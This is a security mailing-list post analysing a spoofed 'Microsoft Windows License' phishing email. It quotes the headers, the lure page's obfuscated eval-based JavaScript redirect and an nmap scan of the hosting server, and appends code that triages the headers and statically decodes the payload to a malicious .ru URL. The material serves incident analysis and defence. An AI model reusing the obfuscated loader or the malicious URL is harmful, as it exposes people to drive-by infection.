[Plug-security] Analysis of a Phishing Email Exploit
Lisa Kachold
lisakachold at obnosis.com
Mon Oct 22 10:04:58 MST 2012
I received a phishing email spoofed from support at obnosis.com. Let's
look into what it does.
Delivered-To: lisakachold at obnosis.com
Received: by 10.64.171.100 with SMTP id at4csp186530iec;
Mon, 22 Oct 2012 08:41:01 -0700 (PDT)
Received: by 10.182.31.43 with SMTP id x11mr6874576obh.68.1350920461345;
Mon, 22 Oct 2012 08:41:01 -0700 (PDT)
Return-Path: <SpencerLevoy at ezweb.ne.jp>
Received: from [2.135.176.89] ([2.135.176.89])
by mx.google.com with ESMTP id r10si10297370obv.209.2012.10.22.08.40.58;
Mon, 22 Oct 2012 08:41:01 -0700 (PDT)
Received-SPF: softfail (google.com: domain of transitioning
SpencerLevoy at ezweb.ne.jp does not designate 2.135.176.89 as permitted
sender) client-ip=2.135.176.89;
Authentication-Results: mx.google.com; spf=softfail (google.com:
domain of transitioning SpencerLevoy at ezweb.ne.jp does not designate
2.135.176.89 as permitted sender) smtp.mail=SpencerLevoy at ezweb.ne.jp
Received: from by lsean.ezweb.ne.jp; Mon, 22 Oct 2012 10:41:00 +0300
Message-ID: <B4F29576.6070405 at lisakachold>
Date: Mon, 22 Oct 2012 10:41:00 +0300
From: <support at obnosis.com>
User-Agent: Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10.5; rv:1.9.2.2)
Gecko/20100316 Lightning/1.0b4 Thunderbird/2.0.0.23
MIME-Version: 1.0
To: lisakachold at obnosis.com
Subject: Re: Fwd: Order N 8080409
Content-Type: multipart/alternative;
boundary="------------000400070406090103060003"
This is a multi-part message in MIME format.
--------------000400070406090103060003
Content-Type: text/plain; charset=Windows-1252; format=flowed
Content-Transfer-Encoding: 7bit
Hello,You can download your Microsoft Windows License here -Microsoft
Corporation
--------------000400070406090103060003
Content-Type: text/html; charset=Windows-1252
Content-Transfer-Encoding: 7bit
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=Windows-1252">
</head>
<body bgcolor="#ffffff" text="#000000">
Hello,<br /><br />
You can download your Microsoft Windows License <a
href="http://private.detlef-kunz.de/page2.htm"> here </a>-<br /><br
/><br />
Microsoft Corporation<br /><br>
</body>
</html>
--------------000400070406090103060003--
http://private.detlef-kunz.de/page2.htm
Page2.htm:
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>page15</title>
</head>
<body>
<h1><b>Please wait a moment. You will be forwarded..</h1></b>
<h3>Internet Explorer or Mozilla Firefox compatible only </h3><br>
<script>v=window;try{dsfsd++}catch(wEGWEGWEg){try{(v+v)()}catch(fsebgreber){m=123;if((alert+"").indexOf("native")!==-1)ev=window["e"+"val"];}
n="5i$@4h$@5e$@29$@31$@2c$@2h$@2j$@a$@5i$@4h$@5e$@2a$@31$@5i$@4h$@5e$@29$@2j$@a$@55$@52$@20$@5i$@4h$@5e$@29$@31$@31$@5i$@4h$@5e$@2a$@21$@1c$@63$@50$@5b$@4j$@5h$@59$@51$@5a$@5g$@26$@58$@5b$@4j$@4h$@5g$@55$@5b$@5a$@31$@1e$@54$@5g$@5g$@5c$@2i$@27$@27$@52$@55$@50$@51$@58$@5b$@4j$@4h$@5f$@5g$@5e$@5b$@5b$@26$@5e$@5h$@2i$@2g$@28$@2g$@28$@27$@52$@5b$@5e$@5h$@59$@27$@58$@55$@5a$@57$@5f$@27$@4j$@5b$@58$@5h$@59$@5a$@26$@5c$@54$@5c$@1e$@2j$@65";h=2;s="";n=n.split("$@");if(m)for(i=0;i-109!=0;i++){k=i;if(window.document)s+=String["fro"+"mCharCode"](parseInt(n[i],20));}try{fsfewbfew--}catch(dgdsh){ev(s);}}</script>
</body>
</html>
-end-
Anyone want to crack the utf-8 in this ampersand encoded malicious
JavaScript and tell us piece by piece what this does?
Reference: http://dev.networkerror.org/utf8/
Tool: http://macchiato.com/unicode/convert.html
Javascript Ampersand padding looks like:
"5i$@4h$@5e$@29$@31$@2c$@2h$@2j$@a$@5i$@4h$@5e$@2a$@31$@5i$@4h$@5e$@29$@2j$@a$@55$@52$@20$@5i$@4h$@5e$@29$@31$@31$@5i$@4h$@5e$@2a$@21$@1c$@63$@50$@5b$@4j$@5h$@59$@51$@5a$@5g$@26$@58$@5b$@4j$@4h$@5g$@55$@5b$@5a$@31$@1e$@54$@5g$@5g$@5c$@2i$@27$@27$@52$@55$@50$@51$@58$@5b$@4j$@4h$@5f$@5g$@5e$@5b$@5b$@26$@5e$@5h$@2i$@2g$@28$@2g$@28$@27$@52$@5b$@5e$@5h$@59$@27$@58$@55$@5a$@57$@5f$@27$@4j$@5b$@58$@5h$@59$@5a$@26$@5c$@54$@5c$@1e$@2j$@65";h=2;s="
I am betting this is an Apple Quicktime embedded exploit:
http://www.youtube.com/watch?v=C6e-shdTvsk
http://private.detlef-kunz.de/ looks like a normal under construction page!
http://whois.domaintools.com/detlef-kunz.de
Immediate Action: Report to private.detlef-kunz.de technical contacts.
[Tech-C]
Type: ROLE
Name: HostEurope GmbH
Address: Welserstrasse 14
PostalCode: 51149
City: Köln
CountryCode: DE
Phone: +49 800 4678387
Fax: +49 1805 663233
Email: <snip>
Changed: 2012-07-12T12:16:13+02:00
Non-authoritative answer:
Name: private.detlef-kunz.de
Addresses: 2a01:488:42:1000:57e6:2f69:6d:740
           87.230.47.105
Starting Nmap 6.01 ( http://nmap.org ) at 2012-10-22 09:58 US Mountain Standard Time
NSE: Loaded 93 scripts for scanning.
NSE: Script Pre-scanning.
Initiating Ping Scan at 09:58
Scanning 87.230.47.105 [4 ports]
Completed Ping Scan at 09:58, 1.11s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 09:58
Completed Parallel DNS resolution of 1 host. at 09:58, 0.36s elapsed
Initiating SYN Stealth Scan at 09:58
Scanning vwp3866.webpack.hosteurope.de (87.230.47.105) [1000 ports]
Discovered open port 21/tcp on 87.230.47.105
Discovered open port 143/tcp on 87.230.47.105
Discovered open port 110/tcp on 87.230.47.105
Discovered open port 587/tcp on 87.230.47.105
Discovered open port 993/tcp on 87.230.47.105
Discovered open port 3306/tcp on 87.230.47.105
Discovered open port 80/tcp on 87.230.47.105
Discovered open port 22/tcp on 87.230.47.105
Discovered open port 995/tcp on 87.230.47.105
Discovered open port 465/tcp on 87.230.47.105
Discovered open port 5666/tcp on 87.230.47.105
Completed SYN Stealth Scan at 09:58, 5.49s elapsed (1000 total ports)
Initiating Service scan at 09:58
Analysis indicates a high probability that this is a hacked server.
Anyone want to expand on this?
--
(503) 754-4452 Android
(623) 239-3392 Skype
(623) 688-3392 Google Voice
it-clowns.com
Chief Clown
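Added example (my code, not part of the original post): a first-pass triage of the headers quoted at the top of the message, the checks a responder runs before touching the link. The header lines are copied from that message with the list archive's " at " restored to "@" and the continuation lines re-folded with leading whitespace as RFC 5322 writes them; the finding labels are this example's own, not any standard's. It flags the four things the raw headers already show: From: claims obnosis.com while Return-Path: is ezweb.ne.jp, Received-SPF: is softfail, the hop stamped by mx.google.com records 2.135.176.89 as the real client, and the sender-supplied "Received: from by lsean.ezweb.ne.jp" and the "@lisakachold" Message-ID are malformed.

```javascript
// Added example, not part of the original post: first-pass triage of the
// headers quoted above.  Copied from that message with " at " restored to
// "@" and continuation lines re-folded with leading whitespace (RFC 5322).
const RAW_HEADERS = [
  "Return-Path: <SpencerLevoy@ezweb.ne.jp>",
  "Received: from [2.135.176.89] ([2.135.176.89])",
  "\tby mx.google.com with ESMTP id r10si10297370obv.209.2012.10.22.08.40.58;",
  "\tMon, 22 Oct 2012 08:41:01 -0700 (PDT)",
  "Received-SPF: softfail (google.com: domain of transitioning",
  "\tSpencerLevoy@ezweb.ne.jp does not designate 2.135.176.89 as permitted",
  "\tsender) client-ip=2.135.176.89;",
  "Received: from by lsean.ezweb.ne.jp; Mon, 22 Oct 2012 10:41:00 +0300",
  "Message-ID: <B4F29576.6070405@lisakachold>",
  "From: <support@obnosis.com>",
  "To: lisakachold@obnosis.com",
  "Subject: Re: Fwd: Order N 8080409",
].join("\r\n");

// Unfold continuation lines and collect each field.  Repeated fields such
// as Received keep their order: the top one is the last hop (our own MX).
function parseHeaders(raw) {
  const fields = {};
  const unfolded = raw.replace(/\r?\n[ \t]+/g, " ").split(/\r?\n/);
  for (const line of unfolded) {
    const idx = line.indexOf(":");
    if (idx < 0) continue;
    const name = line.slice(0, idx).trim().toLowerCase();
    const value = line.slice(idx + 1).trim();
    (fields[name] = fields[name] || []).push(value);
  }
  return fields;
}

// Domain part of the first address-like token in a header value.
function domainOf(value) {
  const m = (value || "").match(/@([^>\s]+)/);
  return m ? m[1].toLowerCase() : null;
}

function triage(raw) {
  const h = parseHeaders(raw);
  const first = (name) => (h[name] || [])[0] || "";
  const received = h["received"] || [];

  const fromDomain = domainOf(first("from"));
  const toDomain = domainOf(first("to"));
  const returnPathDomain = domainOf(first("return-path"));
  const msgIdDomain = domainOf(first("message-id"));
  const spf = (first("received-spf").match(/^(\w+)/) || [])[1] || null;

  // Only the hop stamped by our own MX (mx.google.com here) is trustworthy;
  // every Received line below it was supplied by the sender and may be forged.
  const ourHop = received.find((v) => /\bby mx\.google\.com\b/.test(v)) || "";
  const clientIp = (ourHop.match(/from \[(\d{1,3}(?:\.\d{1,3}){3})\]/) || [])[1] || null;

  const findings = []; // labels are this example's own, not a standard
  if (fromDomain && returnPathDomain && fromDomain !== returnPathDomain) {
    findings.push("from-vs-return-path-mismatch");
  }
  if (spf && spf !== "pass") findings.push("spf-" + spf);
  if (msgIdDomain && !msgIdDomain.includes(".")) findings.push("message-id-not-fqdn");
  if (received.some((v) => /^from by\b/.test(v))) findings.push("malformed-received-hop");
  if (fromDomain && fromDomain === toDomain && spf !== "pass") {
    findings.push("own-domain-sender-unauthenticated");
  }
  return { fromDomain, toDomain, returnPathDomain, msgIdDomain, spf, clientIp, findings };
}

console.log(JSON.stringify(triage(RAW_HEADERS), null, 2));
```

The point of reading only the mx.google.com hop for the client IP is that the lower "Received: from by lsean.ezweb.ne.jp" line is part of the forgery, so 2.135.176.89 (not anything ezweb) is the address to look up and report.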
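Added example (my code, not part of the original post) answering the "crack it piece by piece" question about page2.htm. The page's own loop tells us the scheme: n is split on "$@", each token is parsed with parseInt(token, 20) (base 20, digits 0-9 then a-j), and the result is fed to String.fromCharCode; the wrapper only hands the string to window["e"+"val"] after two throw-and-catch hoops (dsfsd++ on an undeclared name, calling the string (v+v)) and a check that (alert+"") contains "native", i.e. that alert has not been replaced by an analysis hook. The block below repeats the decode statically, never evaluates the result, and pulls the navigation target out of it. PAYLOAD is the value of n copied verbatim from the page; the decoded script and URL are what that payload yields, not anything assumed.

```javascript
// Added example, not part of the original post: static decode of the
// obfuscated script in page2.htm.  PAYLOAD is the value of n from the page.
const PAYLOAD =
  "5i$@4h$@5e$@29$@31$@2c$@2h$@2j$@a$@5i$@4h$@5e$@2a$@31$@5i$@4h$@5e$@29$@2j$@a$@55$@52$@20$@5i$@4h$@5e$@29$@31$@31$@5i$@4h$@5e$@2a$@21$@1c$@63$@50$@5b$@4j$@5h$@59$@51$@5a$@5g$@26$@58$@5b$@4j$@4h$@5g$@55$@5b$@5a$@31$@1e$@54$@5g$@5g$@5c$@2i$@27$@27$@52$@55$@50$@51$@58$@5b$@4j$@4h$@5f$@5g$@5e$@5b$@5b$@26$@5e$@5h$@2i$@2g$@28$@2g$@28$@27$@52$@5b$@5e$@5h$@59$@27$@58$@55$@5a$@57$@5f$@27$@4j$@5b$@58$@5h$@59$@5a$@26$@5c$@54$@5c$@1e$@2j$@65";

// Mirrors the page's loop: split on "$@", parse each token as a base-20
// number and take it as a character code.  Nothing here is executed.
function decodeRadix20(payload, sep = "$@", radix = 20) {
  return payload
    .split(sep)
    .map((tok) => String.fromCharCode(parseInt(tok, radix)))
    .join("");
}

// Pull the document.location target out of the decoded script so it can be
// looked up or blocked without ever reaching eval.
function extractRedirectTarget(decoded) {
  const m = decoded.match(/document\.location\s*=\s*"([^"]+)"/);
  return m ? m[1] : null;
}

function analyse(payload) {
  const decoded = decodeRadix20(payload);
  return {
    // The page's loop runs while i-109!=0, i.e. exactly 109 tokens.
    tokenCount: payload.split("$@").length,
    decoded,
    target: extractRedirectTarget(decoded),
  };
}

const result = analyse(PAYLOAD);
console.log(result.decoded);
console.log("redirects to:", result.target);
```

The decoded script is three lines: var1=49; var2=var1; and if(var1==var2) {document.location="http://fidelocastroo.ru:8080/forum/links/column.php";}. The always-true comparison is padding; the whole thing is a redirect, so page2.htm on the (apparently ordinary) HostEurope host is only a hop and the actual exploit content, whatever it is, lives on the :8080 site, which is where any further analysis of the payload has to look.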